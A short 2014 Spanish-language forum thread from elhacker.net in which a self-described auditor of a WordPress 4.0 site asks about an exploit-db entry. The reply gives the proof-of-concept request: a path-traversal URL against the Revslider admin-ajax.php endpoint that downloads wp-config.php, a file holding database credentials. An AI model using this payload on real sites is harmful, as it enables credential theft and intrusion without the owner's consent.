elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  ayuda con este exploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con este exploit  (Leído 2,613 veces)
spinetta

Desconectado Desconectado

Mensajes: 2


Ver Perfil
ayuda con este exploit
« en: 6 Noviembre 2014, 08:02 am »

Hola, estoy auditando una pagina web que utiliza word press 4.0, buscando en la famosa  base de datos de exploit me encontre con este, http://www.exploit-db.com/exploits/34511/
me llamo la atencion porque encontre una pagina que estaba prohibida en robotos.txt osea que esta pagina no quiere que los buscadores la encuentren, la pagina es wp-admin/admin-ajax.php   y en este exploit se hace mencion a ella.
otra cosa que me serviria , es que si no concen este exploit me digan otro que conozcan. Porque no tengo experiencia en el tema, Gracias !
En línea

ameise_1987

Desconectado Desconectado

Mensajes: 119



Ver Perfil
Re: ayuda con este exploit
« Respuesta #1 en: 7 Noviembre 2014, 02:00 am »

Estimado,

bajo los dorks se encuentra el poc del exploit,

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

ésto nos dice que el parámetro vulnerable es img y desde ahí debes llamar los archivos para descargar, intentaste descargar algún archivo ?? .


saludos!.
En línea

firma retirada por insultar/cachondearse de (anelkaos) del staff.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Que hace este exploit?
Hacking Mobile
#Borracho.- 1 4,394 Último mensaje 26 Diciembre 2005, 18:50 pm
por Gospel
ayuda con este exploit command ejecution
Nivel Web
antoniocaro 1 2,030 Último mensaje 17 Julio 2011, 06:44 am
por Shell Root
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines